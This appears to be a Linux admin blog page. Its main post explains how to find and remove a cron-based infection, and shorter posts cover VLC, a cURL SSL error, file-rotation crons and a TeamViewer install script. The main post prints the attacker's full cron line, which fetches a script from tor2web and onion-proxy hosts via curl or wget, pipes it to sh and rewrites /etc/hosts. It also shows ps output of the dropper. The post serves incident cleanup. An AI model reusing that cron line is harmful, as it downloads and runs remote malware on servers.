[Solved] an7kmd2wp4xo7hpr.tor2web.su Malicious Processes/Crons – Linux

1. Malicious Processes

A. Identify the processes and the its URL name, in below case its an7kmd2wp4xo7hpr.tor2web.su
B. Use command ps aux

root 26561 0.0 0.0 139556 4392 ? S Aug20 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 28777 0.0 0.0 139556 4384 ? S Aug21 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 24990 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24991 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24992 0.0 0.0 106076 1376 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d

2. Malicious Crons

A. Now use the same URL name and grep it in whole server
B. Command is below
[[email protected] ~]# grep -rli an7kmd2wp4xo7hpr    /
/etc/cron.d/root
/etc/cron.monthly/cronlog
/etc/crontab

[[email protected] ~]# cat /etc/cron.d/root
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

[[email protected] ~]# cat /etc/crontab
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

 

Solutions:-

A. Remove the malicious codes from crons or wherever you find and for the time being, put chattr on them as well
B. chattr +i /etc/cron.d/root ; chattr +i /etc/crontab
C.
- Change root password instantly
- Remove all Authorized keys from all users which is not yours

ls -lahd /home/*/.ssh/auth*
ls -lahd /root/.ssh/auth*

- ClamAV - Antivirus
- Maldet - Malware Detector
- Restricting SSH from particular IPs/VPN
- Restricting MySQL from particular IPs/VPN
- CSF Firewall
- LFD Login Failure Daemon
- WAF Web Application Firewall
- ModSecurity with HTTP/Apache
- Avoid using MySQL root user pass in Application code and create a non root mysql user.
- Proper permissions and ownership of code files like of 755 for dirs and 644 for files.
- Non standard SSH port

 

Play VLC Playlist (xspf) with command line CLI – The Big Bang Theory (TBBT)

Hi, by using below command you can made VLC play the playlist, here in my case the PL tbbt-s6.xspf is placed on Desktop. Its actually The Big Bang Theory (TBBT)

[email protected]:~$

/usr/bin/vlc --started-from-file /home/navdeep/Desktop/tbbt-s6.xspf

 

VLC media player 2.2.2 Weatherwax (revision 2.2.2-0-g6259d80)
[0000000002406148] core libvlc: Running vlc with the default interface. Use ‘cvlc’ to use vlc without interface.

[Solved] Fatal error: Uncaught exception ‘GuzzleHttp\Exception\ConnectException – CURLE_SSL_CONNECT_ERROR 35

Error:-
Fatal error: Uncaught exception ‘GuzzleHttp\Exception\ConnectException’ with message ‘cURL error 35: SSL connect error (see http://curl.haxx.se/libcurl/c/libcurl-errors.html)’

Means:-

CURLE_SSL_CONNECT_ERROR (35)

A problem occurred somewhere in the SSL/TLS handshake. You really want the error buffer and read the message there as it pinpoints the problem slightly more. Could be certificates (file formats, paths, permissions), passwords, and others.

Solutions:-

1. Check if your site supports SSLV2, if not enable it

[email protected]:~$ curl --sslv2 https://the-d2.com
curl: (35) GnuTLS does not support SSLv2

 

2. Check if your site’s SSL chain is complete and it have 4 certs in chain

https://www.sslshopper.com/ssl-checker.html#hostname=the-d2.com

Move old files on daily basis with find command to keep folder light – Linux/Unix

I’m working as Linux Admin and on daily basis my work includes taking screenshots, So i put full screenshots in Pictures folder and cropped ones in Music folder.

I ends up with 20 to 30 pictures daily and it takes time to load folder’s files when it have massive files in it So below are the crons which keeps only past 10 days of files and rest of them it moves to zold folder inside them and /dev/null eat all the errors.

0 3,15 * * * find Music/ -mtime +10 -exec mv {} Music/zold/ \; 2> /dev/null

0 14,21 * * * find Pictures/ -mtime +10 -exec mv {} Pictures/zold/ \; 2> /dev/null

Install TEAM VIEWER 12 with Shell Script – Ubuntu

#!/bin/bash
# Use this script for Ubuntu only.
# By default this script will install 64bit Teamviewer


echo "============================================"
echo -e "\e[1;32m REMOVING PREVIOUS TEAMVIEWER IF ANY ............ \e[0m"
echo "============================================"
sudo apt-get remove teamviewer -y
sudo apt autoremove -y
sudo apt-get remove teamviewer:i386 -y
sudo dpkg -r teamviewer:i386
sudo dpkg --purge teamviewer
sudo dpkg --purge teamviewer:i386
sudo apt autoremove -y
rm -fr /tmp/teamviewer*
cd /tmp/ ; wget http://download.teamviewer.com/download/version_12x/teamviewer_amd64.deb
sudo dpkg -i /tmp/teamviewe*
sudo apt-get install libgcc1 -y
sudo apt-get -f install -y
sudo dpkg -l | grep -i teamviewer
if [[ $? != 0 ]]; then
echo "============================================"
echo -e "\e[1;31m TEAM VIEWER 12 INSTALLATION FAILED \e[0m"
echo "============================================"
else
echo "============================================"
echo -e "\e[1;32m TEAM VIEWER 12 INSTALLED SUCCESSFULLY \e[0m"
echo "============================================"
fi